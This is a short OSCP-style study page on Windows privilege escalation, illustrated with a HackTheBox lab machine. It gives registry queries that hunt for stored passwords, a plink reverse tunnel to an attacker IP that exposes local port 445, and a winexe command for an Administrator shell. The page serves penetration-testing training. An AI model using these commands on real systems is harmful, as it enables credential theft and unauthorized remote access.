> For the complete documentation index, see [llms.txt](https://oscp.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.adot8.com/windows-privilege-escalation/stored-passwords-and-port-forwarding.md).

# Stored Passwords and Port Forwarding

## Overview

Credentials can be stored in the **registry** and some ports are on the machine are only accessible from the inside (itself).

What if the user we landed on **is** an Administrator but just needs to provide credentials to execute commands as system?

## Registry Passwords

```powerquery
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```

```powerquery
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
```

### Example output

<figure><img src="/files/EkGL9BCwIJIqfw1bm8KH" alt=""><figcaption><p>HTB Machine Chatterbox</p></figcaption></figure>

## Port Forwarding

```
netstat -ano
```

<figure><img src="/files/JR4nRQU0WyY1i8Laz2s0" alt=""><figcaption><p>HTB Machine Chatterbox</p></figcaption></figure>

[Plink](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html) is an SSH and Telnet client which will allow us to port forward on the machine

Upload and Run **plink.exe** to make it ssh into your machine via the forwarded local port 445, allowing you to access the local port 445.

```powerquery
plink.exe -l root -pw rootpasswd -R 445:127.0.0.1:445 10.10.14.10
```

You'll be in box inception inside of your attacker machine.

Use **winexe** to start a shell as Administrator over the port forward connection

```bash
winexe -U Administrator%Welcome1 //127.0.0.1 cmd.exe
```

{% hint style="info" %}
If there's a credential being leaked in a **CTF** environment chances are it leads to something else so don't disregard it&#x20;
{% endhint %}

{% embed url="<https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html>" %}
